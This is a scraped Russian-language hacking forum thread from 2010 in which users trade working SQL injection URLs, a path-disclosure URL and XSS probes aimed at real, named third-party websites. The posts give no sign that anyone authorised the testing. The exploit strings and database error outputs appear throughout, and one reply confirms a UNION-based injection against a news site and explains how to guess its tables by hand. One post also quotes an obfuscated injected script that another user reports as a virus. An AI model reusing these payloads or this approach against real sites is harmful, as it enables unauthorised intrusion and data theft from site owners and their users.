23.10.2010, 05:40
|
|
Новичок
Регистрация: 26.11.2007
Сообщений: 6
С нами:
9715161
Репутация:
5
|
|
Если в postgresql нет прав usesuper, можно что либо сделать при иньекции?
|
|
|
23.10.2010, 06:11
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами:
8482939
Репутация:
0
|
|
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4
|
|
|
|
23.10.2010, 06:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от gabarea
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4
а вопрос
SQL inj
Код:
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)
FPD
Код:
http://www.mahiram.com/wp-includes/vars.php?PHP_SELF=be
|
|
|
|
23.10.2010, 06:25
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами:
8482939
Репутация:
0
|
|
http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4
Error: The used SELECT statements have a different number of columns
blind sql
|
|
|
|
23.10.2010, 16:37
|
|
Участник форума
Регистрация: 09.07.2010
Сообщений: 276
С нами:
8338646
Репутация:
16
|
|
Сообщение от None
она показывала мне что есть Xss
ну дело в том что она показывает:
Фильтрация по тегу «1206302<>»
а как это понять Я не знаю ??
Для начала - где эта хсс.
Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.
|
|
|
|
23.10.2010, 16:40
|
|
Познающий
Регистрация: 30.09.2010
Сообщений: 88
С нами:
8219126
Репутация:
0
|
|
Сообщение от DesCent
Для начала - где эта хсс.
Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.
вот тут: http://onona.ua/diary/search.phtml?type=popular&tag=1206302%3C%3E
я вот не могу понять как мне найти что бы появилось окошко
-----------------------------------------------------------------
а каким лучше скриптом проверять на уязвимость ??
">alert('xss')
Alert("XSS")
или на пиши свой
ТУТ МНЕ ПОМОГУТ ?
разобраться
|
|
|
|
23.10.2010, 17:04
|
|
Участник форума
Регистрация: 09.07.2010
Сообщений: 276
С нами:
8338646
Репутация:
16
|
|
Уж простите нуба, но самому интересно что это:
При выполнении такого запроса, вверху сайта появляется строчка
Код:
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')">
Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это? |
|
|
|
23.10.2010, 18:13
|
|
Новичок
Регистрация: 23.06.2010
Сообщений: 1
С нами:
8361686
Репутация:
0
|
|
Help!помогите!
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
|
|
|
|
23.10.2010, 18:49
|
|
Познающий
Регистрация: 30.09.2010
Сообщений: 88
С нами:
8219126
Репутация:
0
|
|
Сообщение от DesCent
Уж простите нуба, но самому интересно что это:
При выполнении
такого
запроса, вверху сайта появляется строчка
Код:
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')">
Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это? Ты решил мне помочь ?? я рад
не ходите на эти ссылки он туда вирус всунул У меня авира ругается
|
|
|
|
23.10.2010, 19:16
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами:
9382468
Репутация:
104
|
|
Сообщение от Generalisimu
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.
Запрос правильный.
Вот например выводится id новости.
Код:
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news
Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.
Советую почитать Проведение SQL инъекций в Microsoft Access
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
